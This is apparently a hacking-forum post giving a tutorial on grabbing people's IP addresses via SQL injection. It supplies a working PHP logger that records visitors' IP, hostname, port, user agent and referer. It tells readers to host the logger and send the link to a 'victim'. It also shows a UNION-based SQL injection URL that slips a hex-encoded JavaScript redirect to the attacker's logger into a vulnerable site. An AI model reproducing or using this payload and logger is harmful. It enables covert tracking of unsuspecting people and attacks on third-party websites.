Jump to content
Aerosol

IP Grabbing Via SQL Injection

By Aerosol, in Securitate web

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted

Credit's to: Spanky

Hello all members

Do you know I m new here . But I want to share something for you .

Today I will show you how to grab someone's IP Address using SQL Injection .

Requirements :

  • PHP IP Grabber
  • Hosting or Shelled Website
  • Javascript Knowledge or XSS knowledge
  • SQL Injection Knowledge
  • SQLi vulnerable website

Ok . Lets Start brothers .

  • PHP IP Grabber

<?php

//IP Grabber

//Variables

$protocol = $_SERVER['SERVER_PROTOCOL'];
$ip = $_SERVER['REMOTE_ADDR'];
$port = $_SERVER['REMOTE_PORT'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$ref = $_SERVER['HTTP_REFERER'];
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);

//Print IP, Hostname, Port Number, User Agent and Referer To Log.TXT

$fh = fopen('log.txt', 'a'); 
fwrite($fh, 'IP Address: '."".$ip ."\n");
fwrite($fh, 'Hostname: '."".$hostname ."\n");
fwrite($fh, 'Port Number: '."".$port ."\n");
fwrite($fh, 'User Agent: '."".$agent ."\n");
fwrite($fh, 'HTTP Referer: '."".$ref ."\n\n");
fclose($fh);
?>

Create a file called LOG.TXT in the same folder as this .php script!

Copy above code and open notepad.exe , paste this .

Save this note as filename.php . Then you must save blank note as log.txt .

Now you have PHP IP Grabber . Next Step is Hosting or Shelled Website .

Upload your filename.php and log.txt .

URL wiil be like this . http://hosting.com/filename.php and http://hosting.com/log.txt

You must send http://hosting.com/filename.php to victim. After Victim click you sent URL , you can see IP address at http://hosting.com/log.txt .

But I want to show you sending method to victim , It is very simple and affective for me .

Because I have many of SQL Injectors .

Now you must search SQLi Vulnerable sites and inject it . Ok .

Now , I specify you have been a SQLi vulnerable site . 

http://www.site.com/catid=3 union select 1,2,@@version,4,5--

Above SQL Query will show you about of SQL Version . If you have SQL Knowledge . You will know it easily .

I told you , you must know about of javascript or XSS script . Look at following code .

<script>window.location.href="http:// www.yourhosting.com/yourfilename.php"</script>

This code stand for URL redirect , You can use this code instead of @@version in SQLi Querys .

So Our Final Code will following 

http://www.site.com/catid=3 union select 1,2,0x<script>window.location.href="http:// www.yourhosting.com/yourfilename.php"</script> ,4,5--

You need to change string to hex behind the 0x .

You can chane Text to hex value at following site.

http://www.swingnote.com/tools/texttohex.php

Now you can send this URL to any SQL Injectors

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...